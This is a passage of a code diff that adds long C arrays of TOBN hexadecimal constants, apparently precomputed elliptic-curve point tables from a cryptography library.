+     TOBN(0x80e1aee8, 0x3854ec42), TOBN(0x2a7dbf44, 0x17689dc7),
+     TOBN(0xc004fc0e, 0x3faf4078), TOBN(0xb2f02e9e, 0xdf11862c),
+     TOBN(0xf10a5e0f, 0xa0a1b7b3), TOBN(0x30aca623, 0x8936ec80),
+     TOBN(0xf83cbf05, 0x02f40d9a), TOBN(0x4681c468, 0x2c318a4d),
+     TOBN(0x98575618, 0x0e9c2674), TOBN(0xbe79d046, 0x1847092e),
+     TOBN(0xaf1e480a, 0x78bd01e0), TOBN(0x6dd359e4, 0x72a51db9),
+     TOBN(0x62ce3821, 0xe3afbab6), TOBN(0xc5cee5b6, 0x17733199),
+     TOBN(0xe08b30d4, 0x6ffd9fbb), TOBN(0x6e5bc699, 0x36c610b7),
+     TOBN(0xf343cff2, 0x9ce262cf), TOBN(0xca2e4e35, 0x68b914c1),
+     TOBN(0x011d64c0, 0x16de36c5), TOBN(0xe0b10fdd, 0x42e2b829),
+     TOBN(0x78942981, 0x6685aaf8), TOBN(0xe7511708, 0x230ede97),
+     TOBN(0x671ed8fc, 0x3b922bf8), TOBN(0xe4d8c0a0, 0x4c29b133),
+     TOBN(0x87eb1239, 0x3b6e99c4), TOBN(0xaff3974c, 0x8793beba),
+     TOBN(0x03749405, 0x2c18df9b), TOBN(0xc5c3a293, 0x91007139),
+     TOBN(0x6a77234f, 0xe37a0b95), TOBN(0x02c29a21, 0xb661c96b),
+     TOBN(0xc3aaf1d6, 0x141ecf61), TOBN(0x9195509e, 0x3bb22f53),
+     TOBN(0x29597404, 0x22d51357), TOBN(0x1b083822, 0x537bed60),
+     TOBN(0xcd7d6e35, 0xe07289f0), TOBN(0x1f94c48c, 0x6dd86eff),
+     TOBN(0xc8bb1f82, 0xeb0f9cfa), TOBN(0x9ee0b7e6, 0x1b2eb97d),
+     TOBN(0x5a52fe2e, 0x34d74e31), TOBN(0xa352c310, 0x3bf79ab6),
+     TOBN(0x97ff6c5a, 0xabfeeb8f), TOBN(0xbfbe8fef, 0xf5c97305),
+     TOBN(0xd6081ce6, 0xa7904608), TOBN(0x1f812f3a, 0xc4fca249),
+     TOBN(0x9b24bc9a, 0xb9e5e200), TOBN(0x91022c67, 0x38012ee8),
+     TOBN(0xe83d9c5d, 0x30a713a1), TOBN(0x4876e3f0, 0x84ef0f93),
+     TOBN(0xc9777029, 0xc1fbf928), TOBN(0xef7a6bb3, 0xbce7d2a4),
+     TOBN(0xb8067228, 0xdfa2a659), TOBN(0xd5cd3398, 0xd877a48f),
+     TOBN(0xbea4fd8f, 0x025d0f3f), TOBN(0xd67d2e35, 0x2eae7c2b),
+     TOBN(0x184de7d7, 0xcc5f4394), TOBN(0xb5551b5c, 0x4536e142),
+     TOBN(0x2e89b212, 0xd34aa60a), TOBN(0x14a96fea, 0xf50051d5),
+     TOBN(0x4e21ef74, 0x0d12bb0b), TOBN(0xc522f020, 0x60b9677e),
+     TOBN(0x8b12e467, 0x2df7731d), TOBN(0x39f80382, 0x7b326d31),
+     TOBN(0xdfb8630c, 0x39024a94), TOBN(0xaacb96a8, 0x97319452),
+     TOBN(0xd68a3961, 0xeda3867c), TOBN(0x0c58e2b0, 0x77c4ffca),
+     TOBN(0x3d545d63, 0x4da919fa), TOBN(0xef79b69a, 0xf15e2289),
+     TOBN(0x54bc3d3d, 0x808bab10), TOBN(0xc8ab3007, 0x45f82c37),
+     TOBN(0xc12738b6, 0x7c4a658a), TOBN(0xb3c47639, 0x40e72182),
+     TOBN(0x3b77be46, 0x8798e44f), TOBN(0xdc047df2, 0x17a7f85f),
+     TOBN(0x2439d4c5, 0x5e59d92d), TOBN(0xcedca475, 0xe8e64d8d),
+     TOBN(0xa724cd0d, 0x87ca9b16), TOBN(0x35e4fd59, 0xa5540dfe),
+     TOBN(0xf8c1ff18, 0xe4bcf6b1), TOBN(0x856d6285, 0x295018fa),
+     TOBN(0x433f665c, 0x3263c949), TOBN(0xa6a76dd6, 0xa1f21409),
+     TOBN(0x17d32334, 0xcc7b4f79), TOBN(0xa1d03122, 0x06720e4a),
+     TOBN(0xadb6661d, 0x81d9bed5), TOBN(0xf0d6fb02, 0x11db15d1),
+     TOBN(0x7fd11ad5, 0x1fb747d2), TOBN(0xab50f959, 0x3033762b),
+     TOBN(0x2a7e711b, 0xfbefaf5a), TOBN(0xc7393278, 0x3fef2bbf),
+     TOBN(0xe29fa244, 0x0df6f9be), TOBN(0x9092757b, 0x71efd215),
+     TOBN(0xee60e311, 0x4f3d6fd9), TOBN(0x338542d4, 0x0acfb78b),
+     TOBN(0x44a23f08, 0x38961a0f), TOBN(0x1426eade, 0x986987ca),
+     TOBN(0x36e6ee2e, 0x4a863cc6), TOBN(0x48059420, 0x628b8b79),
+     TOBN(0x30303ad8, 0x7396e1de), TOBN(0x5c8bdc48, 0x38c5aad1),
+     TOBN(0x3e40e11f, 0x5c8f5066), TOBN(0xabd6e768, 0x8d246bbd),
+     TOBN(0x68aa40bb, 0x23330a01), TOBN(0xd23f5ee4, 0xc34eafa0),
+     TOBN(0x3bbee315, 0x5de02c21), TOBN(0x18dd4397, 0xd1d8dd06),
+     TOBN(0x3ba1939a, 0x122d7b44), TOBN(0xe6d3b40a, 0xa33870d6),
+     TOBN(0x8e620f70, 0x1c4fe3f8), TOBN(0xf6bba1a5, 0xd3a50cbf),
+     TOBN(0x4a78bde5, 0xcfc0aee0), TOBN(0x847edc46, 0xc08c50bd),
+     TOBN(0xbaa2439c, 0xad63c9b2), TOBN(0xceb4a728, 0x10fc2acb),
+     TOBN(0xa419e40e, 0x26da033d), TOBN(0x6cc3889d, 0x03e02683),
+     TOBN(0x1cd28559, 0xfdccf725), TOBN(0x0fd7e0f1, 0x8d13d208),
+     TOBN(0x01b9733b, 0x1f0df9d4), TOBN(0x8cc2c5f3, 0xa2b5e4f3),
+     TOBN(0x43053bfa, 0x3a304fd4), TOBN(0x8e87665c, 0x0a9f1aa7),
+     TOBN(0x087f29ec, 0xd73dc965), TOBN(0x15ace455, 0x3e9023db),
+     TOBN(0x2370e309, 0x2bce28b4), TOBN(0xf9723442, 0xb6b1e84a),
+     TOBN(0xbeee662e, 0xb72d9f26), TOBN(0xb19396de, 0xf0e47109),
+     TOBN(0x85b1fa73, 0xe13289d0), TOBN(0x436cf77e, 0x54e58e32),
+     TOBN(0x0ec833b3, 0xe990ef77), TOBN(0x7373e3ed, 0x1b11fc25),
+     TOBN(0xbe0eda87, 0x0fc332ce), TOBN(0xced04970, 0x8d7ea856),
+     TOBN(0xf85ff785, 0x7e977ca0), TOBN(0xb66ee8da, 0xdfdd5d2b),
+     TOBN(0xf5e37950, 0x905af461), TOBN(0x587b9090, 0x966d487c),
+     TOBN(0x6a198a1b, 0x32ba0127), TOBN(0xa7720e07, 0x141615ac),
+     TOBN(0xa23f3499, 0x996ef2f2), TOBN(0xef5f64b4, 0x470bcb3d),
+     TOBN(0xa526a962, 0x92b8c559), TOBN(0x0c14aac0, 0x69740a0f),
+     TOBN(0x0d41a9e3, 0xa6bdc0a5), TOBN(0x97d52106, 0x9c48aef4),
+     TOBN(0xcf16bd30, 0x3e7c253b), TOBN(0xcc834b1a, 0x47fdedc1),
+     TOBN(0x7362c6e5, 0x373aab2e), TOBN(0x264ed85e, 0xc5f590ff),
+     TOBN(0x7a46d9c0, 0x66d41870), TOBN(0xa50c20b1, 0x4787ba09),
+     TOBN(0x185e7e51, 0xe3d44635), TOBN(0xb3b3e080, 0x31e2d8dc),
+     TOBN(0xbed1e558, 0xa179e9d9), TOBN(0x2daa3f79, 0x74a76781),
+     TOBN(0x4372baf2, 0x3a40864f), TOBN(0x46900c54, 0x4fe75cb5),
+     TOBN(0xb95f171e, 0xf76765d0), TOBN(0x4ad726d2, 0x95c87502),
+     TOBN(0x2ec769da, 0x4d7c99bd), TOBN(0x5e2ddd19, 0xc36cdfa8),
+     TOBN(0xc22117fc, 0xa93e6dea), TOBN(0xe8a2583b, 0x93771123),
+     TOBN(0xbe2f6089, 0xfa08a3a2), TOBN(0x4809d5ed, 0x8f0e1112),
+     TOBN(0x3b414aa3, 0xda7a095e), TOBN(0x9049acf1, 0x26f5aadd),
+     TOBN(0x78d46a4d, 0x6be8b84a), TOBN(0xd66b1963, 0xb732b9b3),
+     TOBN(0x5c2ac2a0, 0xde6e9555), TOBN(0xcf52d098, 0xb5bd8770),
+     TOBN(0x15a15fa6, 0x0fd28921), TOBN(0x56ccb81e, 0x8b27536d),
+     TOBN(0x0f0d8ab8, 0x9f4ccbb8), TOBN(0xed5f44d2, 0xdb221729),
+     TOBN(0x43141988, 0x00bed10c), TOBN(0xc94348a4, 0x1d735b8b),
+     TOBN(0x79f3e9c4, 0x29ef8479), TOBN(0x4c13a4e3, 0x614c693f),
+     TOBN(0x32c9af56, 0x8e143a14), TOBN(0xbc517799, 0xe29ac5c4),
+     TOBN(0x05e17992, 0x2774856f), TOBN(0x6e52fb05, 0x6c1bf55f),
+     TOBN(0xaeda4225, 0xe4f19e16), TOBN(0x70f4728a, 0xaf5ccb26),
+     TOBN(0x5d2118d1, 0xb2947f22), TOBN(0xc827ea16, 0x281d6fb9),
+     TOBN(0x8412328d, 0x8cf0eabd), TOBN(0x45ee9fb2, 0x03ef9dcf),
+     TOBN(0x8e700421, 0xbb937d63), TOBN(0xdf8ff2d5, 0xcc4b37a6),
+     TOBN(0xa4c0d5b2, 0x5ced7b68), TOBN(0x6537c1ef, 0xc7308f59),
+     TOBN(0x25ce6a26, 0x3b37f8e8), TOBN(0x170e9a9b, 0xdeebc6ce),
+     TOBN(0xdd037952, 0x8728d72c), TOBN(0x445b0e55, 0x850154bc),
+     TOBN(0x4b7d0e06, 0x83a7337b), TOBN(0x1e3416d4, 0xffecf249),
+     TOBN(0x24840eff, 0x66a2b71f), TOBN(0xd0d9a50a, 0xb37cc26d),
+     TOBN(0xe2198150, 0x6fe28ef7), TOBN(0x3cc5ef16, 0x23324c7f),
+     TOBN(0x220f3455, 0x769b5263), TOBN(0xe2ade2f1, 0xa10bf475),
+     TOBN(0x28cd20fa, 0x458d3671), TOBN(0x1549722c, 0x2dc4847b),
+     TOBN(0x6dd01e55, 0x591941e3), TOBN(0x0e6fbcea, 0x27128ccb),
+     TOBN(0xae1a1e6b, 0x3bef0262), TOBN(0xfa8c472c, 0x8f54e103),
+     TOBN(0x7539c0a8, 0x72c052ec), TOBN(0xd7b27369, 0x5a3490e9),
+     TOBN(0x143fe1f1, 0x71684349), TOBN(0x36b4722e, 0x32e19b97),
+     TOBN(0xdc059227, 0x90980aff), TOBN(0x175c9c88, 0x9e13d674),
+     TOBN(0xa7de5b22, 0x6e6bfdb1), TOBN(0x5ea5b7b2, 0xbedb4b46),
+     TOBN(0xd5570191, 0xd34a6e44), TOBN(0xfcf60d2e, 0xa24ff7e6),
+     TOBN(0x614a392d, 0x677819e1), TOBN(0x7be74c7e, 0xaa5a29e8),
+     TOBN(0xab50fece, 0x63c85f3f), TOBN(0xaca2e2a9, 0x46cab337),
+     TOBN(0x7f700388, 0x122a6fe3), TOBN(0xdb69f703, 0x882a04a8),
+     TOBN(0x9a77935d, 0xcf7aed57), TOBN(0xdf16207c, 0x8d91c86f),
+     TOBN(0x2fca49ab, 0x63ed9998), TOBN(0xa3125c44, 0xa77ddf96),
+     TOBN(0x05dd8a86, 0x24344072), TOBN(0xa023dda2, 0xfec3fb56),
+     TOBN(0x421b41fc, 0x0c743032), TOBN(0x4f2120c1, 0x5e438639),
+     TOBN(0xfb7cae51, 0xc83c1b07), TOBN(0xb2370caa, 0xcac2171a),
+     TOBN(0x2eb2d962, 0x6cc820fb), TOBN(0x59feee5c, 0xb85a44bf),
+     TOBN(0x94620fca, 0x5b6598f0), TOBN(0x6b922cae, 0x7e314051),
+     TOBN(0xff8745ad, 0x106bed4e), TOBN(0x546e71f5, 0xdfa1e9ab),
+     TOBN(0x935c1e48, 0x1ec29487), TOBN(0x9509216c, 0x4d936530),
+     TOBN(0xc7ca3067, 0x85c9a2db), TOBN(0xd6ae5152, 0x6be8606f),
+     TOBN(0x09dbcae6, 0xe14c651d), TOBN(0xc9536e23, 0x9bc32f96),
+     TOBN(0xa90535a9, 0x34521b03), TOBN(0xf39c526c, 0x878756ff),
+     TOBN(0x383172ec, 0x8aedf03c), TOBN(0x20a8075e, 0xefe0c034),
+     TOBN(0xf22f9c62, 0x64026422), TOBN(0x8dd10780, 0x24b9d076),
+     TOBN(0x944c742a, 0x3bef2950), TOBN(0x55b9502e, 0x88a2b00b),
+     TOBN(0xa59e14b4, 0x86a09817), TOBN(0xa39dd3ac, 0x47bb4071),
+     TOBN(0x55137f66, 0x3be0592f), TOBN(0x07fcafd4, 0xc9e63f5b),
+     TOBN(0x963652ee, 0x346eb226), TOBN(0x7dfab085, 0xec2facb7),
+     TOBN(0x273bf2b8, 0x691add26), TOBN(0x30d74540, 0xf2b46c44),
+     TOBN(0x05e8e73e, 0xf2c2d065), TOBN(0xff9b8a00, 0xd42eeac9),
+     TOBN(0x2fcbd205, 0x97209d22), TOBN(0xeb740ffa, 0xde14ea2c),
+     TOBN(0xc71ff913, 0xa8aef518), TOBN(0x7bfc74bb, 0xfff4cfa2),
+     TOBN(0x1716680c, 0xb6b36048), TOBN(0x121b2cce, 0x9ef79af1),
+     TOBN(0xbff3c836, 0xa01eb3d3), TOBN(0x50eb1c6a, 0x5f79077b),
+     TOBN(0xa48c32d6, 0xa004bbcf), TOBN(0x47a59316, 0x7d64f61d),
+     TOBN(0x6068147f, 0x93102016), TOBN(0x12c5f654, 0x94d12576),
+     TOBN(0xefb071a7, 0xc9bc6b91), TOBN(0x7c2da0c5, 0x6e23ea95),
+     TOBN(0xf4fd45b6, 0xd4a1dd5d), TOBN(0x3e7ad9b6, 0x9122b13c),
+     TOBN(0x342ca118, 0xe6f57a48), TOBN(0x1c2e94a7, 0x06f8288f),
+     TOBN(0x99e68f07, 0x5a97d231), TOBN(0x7c80de97, 0x4d838758),
+     TOBN(0xbce0f5d0, 0x05872727), TOBN(0xbe5d95c2, 0x19c4d016),
+     TOBN(0x921d5cb1, 0x9c2492ee), TOBN(0x42192dc1, 0x404d6fb3),
+     TOBN(0x4c84dcd1, 0x32f988d3), TOBN(0xde26d61f, 0xa17b8e85),
+     TOBN(0xc466dcb6, 0x137c7408), TOBN(0x9a38d7b6, 0x36a266da),
+     TOBN(0x7ef5cb06, 0x83bebf1b), TOBN(0xe5cdcbbf, 0x0fd014e3),
+     TOBN(0x30aa376d, 0xf65965a0), TOBN(0x60fe88c2, 0xebb3e95e),
+     TOBN(0x33fd0b61, 0x66ee6f20), TOBN(0x8827dcdb, 0x3f41f0a0),
+     TOBN(0xbf8a9d24, 0x0c56c690), TOBN(0x40265dad, 0xddb7641d),
+     TOBN(0x522b05bf, 0x3a6b662b), TOBN(0x466d1dfe, 0xb1478c9b),
+     TOBN(0xaa616962, 0x1484469b), TOBN(0x0db60549, 0x02df8f9f),
+     TOBN(0xc37bca02, 0x3cb8bf51), TOBN(0x5effe346, 0x21371ce8),
+     TOBN(0xe8f65264, 0xff112c32), TOBN(0x8a9c736d, 0x7b971fb2),
+     TOBN(0xa4f19470, 0x7b75080d), TOBN(0xfc3f2c5a, 0x8839c59b),
+     TOBN(0x1d6c777e, 0x5aeb49c2), TOBN(0xf3db034d, 0xda1addfe),
+     TOBN(0xd76fee5a, 0x5535affc), TOBN(0x0853ac70, 0xb92251fd),
+     TOBN(0x37e3d594, 0x8b2a29d5), TOBN(0x28f1f457, 0x4de00ddb),
+     TOBN(0x8083c1b5, 0xf42c328b), TOBN(0xd8ef1d8f, 0xe493c73b),
+     TOBN(0x96fb6260, 0x41dc61bd), TOBN(0xf74e8a9d, 0x27ee2f8a),
+     TOBN(0x7c605a80, 0x2c946a5d), TOBN(0xeed48d65, 0x3839ccfd),
+     TOBN(0x9894344f, 0x3a29467a), TOBN(0xde81e949, 0xc51eba6d),
+     TOBN(0xdaea066b, 0xa5e5c2f2), TOBN(0x3fc8a614, 0x08c8c7b3),
+     TOBN(0x7adff88f, 0x06d0de9f), TOBN(0xbbc11cf5, 0x3b75ce0a),
+     TOBN(0x9fbb7acc, 0xfbbc87d5), TOBN(0xa1458e26, 0x7badfde2)}
+    ,
+    {TOBN(0x1cb43668, 0xe039c256), TOBN(0x5f26fb8b, 0x7c17fd5d),
+     TOBN(0xeee426af, 0x79aa062b), TOBN(0x072002d0, 0xd78fbf04),
+     TOBN(0x4c9ca237, 0xe84fb7e3), TOBN(0xb401d8a1, 0x0c82133d),
+     TOBN(0xaaa52592, 0x6d7e4181), TOBN(0xe9430833, 0x73dbb152),
+     TOBN(0xf92dda31, 0xbe24319a), TOBN(0x03f7d28b, 0xe095a8e7),
+     TOBN(0xa52fe840, 0x98782185), TOBN(0x276ddafe, 0x29c24dbc),
+     TOBN(0x80cd5496, 0x1d7a64eb), TOBN(0xe4360889, 0x7f1dbe42),
+     TOBN(0x2f81a877, 0x8438d2d5), TOBN(0x7e4d52a8, 0x85169036),
+     TOBN(0x19e3d5b1, 0x1d59715d), TOBN(0xc7eaa762, 0xd788983e),
+     TOBN(0xe5a730b0, 0xabf1f248), TOBN(0xfbab8084, 0xfae3fd83),
+     TOBN(0x65e50d21, 0x53765b2f), TOBN(0xbdd4e083, 0xfa127f3d),
+     TOBN(0x9cf3c074, 0x397b1b10), TOBN(0x59f8090c, 0xb1b59fd3),
+     TOBN(0x7b15fd9d, 0x615faa8f), TOBN(0x8fa1eb40, 0x968554ed),
+     TOBN(0x7bb4447e, 0x7aa44882), TOBN(0x2bb2d0d1, 0x029fff32),
+     TOBN(0x075e2a64, 0x6caa6d2f), TOBN(0x8eb879de, 0x22e7351b),
+     TOBN(0xbcd5624e, 0x9a506c62), TOBN(0x218eaef0, 0xa87e24dc),
+     TOBN(0x37e56847, 0x44ddfa35), TOBN(0x9ccfc5c5, 0xdab3f747),
+     TOBN(0x9ac1df3f, 0x1ee96cf4), TOBN(0x0c0571a1, 0x3b480b8f),
+     TOBN(0x2fbeb3d5, 0x4b3a7b3c), TOBN(0x35c03669, 0x5dcdbb99),
+     TOBN(0x52a0f5dc, 0xb2415b3a), TOBN(0xd57759b4, 0x4413ed9a),
+     TOBN(0x1fe647d8, 0x3d30a2c5), TOBN(0x0857f77e, 0xf78a81dc),
+     TOBN(0x11d5a334, 0x131a4a9b), TOBN(0xc0a94af9, 0x29d393f5),
+     TOBN(0xbc3a5c0b, 0xdaa6ec1a), TOBN(0xba9fe493, 0x88d2d7ed),
+     TOBN(0xbb4335b4, 0xbb614797), TOBN(0x991c4d68, 0x72f83533),
+     TOBN(0x53258c28, 0xd2f01cb3), TOBN(0x93d6eaa3, 0xd75db0b1),
+     TOBN(0x419a2b0d, 0xe87d0db4), TOBN(0xa1e48f03, 0xd8fe8493),
+     TOBN(0xf747faf6, 0xc508b23a), TOBN(0xf137571a, 0x35d53549),
+     TOBN(0x9f5e58e2, 0xfcf9b838), TOBN(0xc7186cee, 0xa7fd3cf5),
+     TOBN(0x77b868ce, 0xe978a1d3), TOBN(0xe3a68b33, 0x7ab92d04),
+     TOBN(0x51029794, 0x87a5b862), TOBN(0x5f0606c3, 0x3a61d41d),
+     TOBN(0x2814be27, 0x6f9326f1), TOBN(0x2f521c14, 0xc6fe3c2e),
+     TOBN(0x17464d7d, 0xacdf7351), TOBN(0x10f5f9d3, 0x777f7e44),
+     TOBN(0xce8e616b, 0x269fb37d), TOBN(0xaaf73804, 0x7de62de5),
+     TOBN(0xaba11175, 0x4fdd4153), TOBN(0x515759ba, 0x3770b49b),
+     TOBN(0x8b09ebf8, 0xaa423a61), TOBN(0x592245a1, 0xcd41fb92),
+     TOBN(0x1cba8ec1, 0x9b4c8936), TOBN(0xa87e91e3, 0xaf36710e),
+     TOBN(0x1fd84ce4, 0x3d34a2e3), TOBN(0xee3759ce, 0xb43b5d61),
+     TOBN(0x895bc78c, 0x619186c7), TOBN(0xf19c3809, 0xcbb9725a),
+     TOBN(0xc0be21aa, 0xde744b1f), TOBN(0xa7d222b0, 0x60f8056b),
+     TOBN(0x74be6157, 0xb23efe11), TOBN(0x6fab2b4f, 0x0cd68253),
+     TOBN(0xad33ea5f, 0x4bf1d725), TOBN(0x9c1d8ee2, 0x4f6c950f),
+     TOBN(0x544ee78a, 0xa377af06), TOBN(0x54f489bb, 0x94a113e1),
+     TOBN(0x8f11d634, 0x992fb7e8), TOBN(0x0169a7aa, 0xa2a44347),
+     TOBN(0x1d49d4af, 0x95020e00), TOBN(0x95945722, 0xe08e120b),
+     TOBN(0xb6e33878, 0xa4d32282), TOBN(0xe36e029d, 0x48020ae7),
+     TOBN(0xe05847fb, 0x37a9b750), TOBN(0xf876812c, 0xb29e3819),
+     TOBN(0x84ad138e, 0xd23a17f0), TOBN(0x6d7b4480, 0xf0b3950e),
+     TOBN(0xdfa8aef4, 0x2fd67ae0), TOBN(0x8d3eea24, 0x52333af6),
+     TOBN(0x0d052075, 0xb15d5acc), TOBN(0xc6d9c79f, 0xbd815bc4),
+     TOBN(0x8dcafd88, 0xdfa36cf2), TOBN(0x908ccbe2, 0x38aa9070),
+     TOBN(0x638722c4, 0xba35afce), TOBN(0x5a3da8b0, 0xfd6abf0b),
+     TOBN(0x2dce252c, 0xc9c335c1), TOBN(0x84e7f0de, 0x65aa799b),
+     TOBN(0x2101a522, 0xb99a72cb), TOBN(0x06de6e67, 0x87618016),
+     TOBN(0x5ff8c7cd, 0xe6f3653e), TOBN(0x0a821ab5, 0xc7a6754a),
+     TOBN(0x7e3fa52b, 0x7cb0b5a2), TOBN(0xa7fb121c, 0xc9048790),
+     TOBN(0x1a725020, 0x06ce053a), TOBN(0xb490a31f, 0x04e929b0),
+     TOBN(0xe17be47d, 0x62dd61ad), TOBN(0x781a961c, 0x6be01371),
+     TOBN(0x1063bfd3, 0xdae3cbba), TOBN(0x35647406, 0x7f73c9ba),
+     TOBN(0xf50e957b, 0x2736a129), TOBN(0xa6313702, 0xed13f256),
+     TOBN(0x9436ee65, 0x3a19fcc5), TOBN(0xcf2bdb29, 0xe7a4c8b6),
+     TOBN(0xb06b1244, 0xc5f95cd8), TOBN(0xda8c8af0, 0xf4ab95f4),
+     TOBN(0x1bae59c2, 0xb9e5836d), TOBN(0x07d51e7e, 0x3acffffc),
+     TOBN(0x01e15e6a, 0xc2ccbcda), TOBN(0x3bc1923f, 0x8528c3e0),
+     TOBN(0x43324577, 0xa49fead4), TOBN(0x61a1b884, 0x2aa7a711),
+     TOBN(0xf9a86e08, 0x700230ef), TOBN(0x0af585a1, 0xbd19adf8),
+     TOBN(0x7645f361, 0xf55ad8f2), TOBN(0x6e676223, 0x46c3614c),
+     TOBN(0x23cb257c, 0x4e774d3f), TOBN(0x82a38513, 0xac102d1b),
+     TOBN(0x9bcddd88, 0x7b126aa5), TOBN(0xe716998b, 0xeefd3ee4),
+     TOBN(0x4239d571, 0xfb167583), TOBN(0xdd011c78, 0xd16c8f8a),
+     TOBN(0x271c2895, 0x69a27519), TOBN(0x9ce0a3b7, 0xd2d64b6a),
+     TOBN(0x8c977289, 0xd5ec6738), TOBN(0xa3b49f9a, 0x8840ef6b),
+     TOBN(0x808c14c9, 0x9a453419), TOBN(0x5c00295b, 0x0cf0a2d5),
+     TOBN(0x524414fb, 0x1d4bcc76), TOBN(0xb07691d2, 0x459a88f1),
+     TOBN(0x77f43263, 0xf70d110f), TOBN(0x64ada5e0, 0xb7abf9f3),
+     TOBN(0xafd0f94e, 0x5b544cf5), TOBN(0xb4a13a15, 0xfd2713fe),
+     TOBN(0xb99b7d6e, 0x250c74f4), TOBN(0x097f2f73, 0x20324e45),
+     TOBN(0x994b37d8, 0xaffa8208), TOBN(0xc3c31b0b, 0xdc29aafc),
+     TOBN(0x3da74651, 0x7a3a607f), TOBN(0xd8e1b8c1, 0xfe6955d6),
+     TOBN(0x716e1815, 0xc8418682), TOBN(0x541d487f, 0x7dc91d97),
+     TOBN(0x48a04669, 0xc6996982), TOBN(0xf39cab15, 0x83a6502e),
+     TOBN(0x025801a0, 0xe68db055), TOBN(0xf3569758, 0xba3338d5),
+     TOBN(0xb0c8c0aa, 0xee2afa84), TOBN(0x4f6985d3, 0xfb6562d1),
+     TOBN(0x351f1f15, 0x132ed17a), TOBN(0x510ed0b4, 0xc04365fe),
+     TOBN(0xa3f98138, 0xe5b1f066), TOBN(0xbc9d95d6, 0x32df03dc),
+     TOBN(0xa83ccf6e, 0x19abd09e), TOBN(0x0b4097c1, 0x4ff17edb),
+     TOBN(0x58a5c478, 0xd64a06ce), TOBN(0x2ddcc3fd, 0x544a58fd),
+     TOBN(0xd449503d, 0x9e8153b8), TOBN(0x3324fd02, 0x7774179b),
+     TOBN(0xaf5d47c8, 0xdbd9120c), TOBN(0xeb860162, 0x34fa94db),
+     TOBN(0x5817bdd1, 0x972f07f4), TOBN(0xe5579e2e, 0xd27bbceb),
+     TOBN(0x86847a1f, 0x5f11e5a6), TOBN(0xb39ed255, 0x7c3cf048),
+     TOBN(0xe1076417, 0xa2f62e55), TOBN(0x6b9ab38f, 0x1bcf82a2),
+     TOBN(0x4bb7c319, 0x7aeb29f9), TOBN(0xf6d17da3, 0x17227a46),
+     TOBN(0xab53ddbd, 0x0f968c00), TOBN(0xa03da7ec, 0x000c880b),
+     TOBN(0x7b239624, 0x6a9ad24d), TOBN(0x612c0401, 0x01ec60d0),
+     TOBN(0x70d10493, 0x109f5df1), TOBN(0xfbda4030, 0x80af7550),
+     TOBN(0x30b93f95, 0xc6b9a9b3), TOBN(0x0c74ec71, 0x007d9418),
+     TOBN(0x94175564, 0x6edb951f), TOBN(0x5f4a9d78, 0x7f22c282),
+     TOBN(0xb7870895, 0xb38d1196), TOBN(0xbc593df3, 0xa228ce7c),
+     TOBN(0xc78c5bd4, 0x6af3641a), TOBN(0x7802200b, 0x3d9b3dcc),
+     TOBN(0x0dc73f32, 0x8be33304), TOBN(0x847ed87d, 0x61ffb79a),
+     TOBN(0xf85c974e, 0x6d671192), TOBN(0x1e14100a, 0xde16f60f),
+     TOBN(0x45cb0d5a, 0x95c38797), TOBN(0x18923bba, 0x9b022da4),
+     TOBN(0xef2be899, 0xbbe7e86e), TOBN(0x4a1510ee, 0x216067bf),
+     TOBN(0xd98c8154, 0x84d5ce3e), TOBN(0x1af777f0, 0xf92a2b90),
+     TOBN(0x9fbcb400, 0x4ef65724), TOBN(0x3e04a4c9, 0x3c0ca6fe),
+     TOBN(0xfb3e2cb5, 0x55002994), TOBN(0x1f3a93c5, 0x5363ecab),
+     TOBN(0x1fe00efe, 0x3923555b), TOBN(0x744bedd9, 0x1e1751ea),
+     TOBN(0x3fb2db59, 0x6ab69357), TOBN(0x8dbd7365, 0xf5e6618b),
+     TOBN(0x99d53099, 0xdf1ea40e), TOBN(0xb3f24a0b, 0x57d61e64),
+     TOBN(0xd088a198, 0x596eb812), TOBN(0x22c8361b, 0x5762940b),
+     TOBN(0x66f01f97, 0xf9c0d95c), TOBN(0x88461172, 0x8e43cdae),
+     TOBN(0x11599a7f, 0xb72b15c3), TOBN(0x135a7536, 0x420d95cc),
+     TOBN(0x2dcdf0f7, 0x5f7ae2f6), TOBN(0x15fc6e1d, 0xd7fa6da2),
+     TOBN(0x81ca829a, 0xd1d441b6), TOBN(0x84c10cf8, 0x04a106b6),
+     TOBN(0xa9b26c95, 0xa73fbbd0), TOBN(0x7f24e0cb, 0x4d8f6ee8),
+     TOBN(0x48b45937, 0x1e25a043), TOBN(0xf8a74fca, 0x036f3dfe),
+     TOBN(0x1ed46585, 0xc9f84296), TOBN(0x7fbaa8fb, 0x3bc278b0),
+     TOBN(0xa8e96cd4, 0x6c4fcbd0), TOBN(0x940a1202, 0x73b60a5f),
+     TOBN(0x34aae120, 0x55a4aec8), TOBN(0x550e9a74, 0xdbd742f0),
+     TOBN(0x794456d7, 0x228c68ab), TOBN(0x492f8868, 0xa4e25ec6),
+     TOBN(0x682915ad, 0xb2d8f398), TOBN(0xf13b51cc, 0x5b84c953),
+     TOBN(0xcda90ab8, 0x5bb917d6), TOBN(0x4b615560, 0x4ea3dee1),
+     TOBN(0x578b4e85, 0x0a52c1c8), TOBN(0xeab1a695, 0x20b75fc4),
+     TOBN(0x60c14f3c, 0xaa0bb3c6), TOBN(0x220f448a, 0xb8216094),
+     TOBN(0x4fe7ee31, 0xb0e63d34), TOBN(0xf4600572, 0xa9e54fab),
+     TOBN(0xc0493334, 0xd5e7b5a4), TOBN(0x8589fb92, 0x06d54831),
+     TOBN(0xaa70f5cc, 0x6583553a), TOBN(0x0879094a, 0xe25649e5),
+     TOBN(0xcc904507, 0x10044652), TOBN(0xebb0696d, 0x02541c4f),
+     TOBN(0x5a171fde, 0xb9718710), TOBN(0x38f1bed8, 0xf374a9f5),
+     TOBN(0xc8c582e1, 0xba39bdc1), TOBN(0xfc457b0a, 0x908cc0ce),
+     TOBN(0x9a187fd4, 0x883841e2), TOBN(0x8ec25b39, 0x38725381),
+     TOBN(0x2553ed05, 0x96f84395), TOBN(0x095c7661, 0x6f6c6897),
+     TOBN(0x917ac85c, 0x4bdc5610), TOBN(0xb2885fe4, 0x179eb301),
+     TOBN(0x5fc65547, 0x8b78bdcc), TOBN(0x4a9fc893, 0xe59e4699),
+     TOBN(0xbb7ff0cd, 0x3ce299af), TOBN(0x195be9b3, 0xadf38b20),
+     TOBN(0x6a929c87, 0xd38ddb8f), TOBN(0x55fcc99c, 0xb21a51b9),
+     TOBN(0x2b695b4c, 0x721a4593), TOBN(0xed1e9a15, 0x768eaac2),
+     TOBN(0xfb63d71c, 0x7489f914), TOBN(0xf98ba31c, 0x78118910),
+     TOBN(0x80291373, 0x9b128eb4), TOBN(0x7801214e, 0xd448af4a),
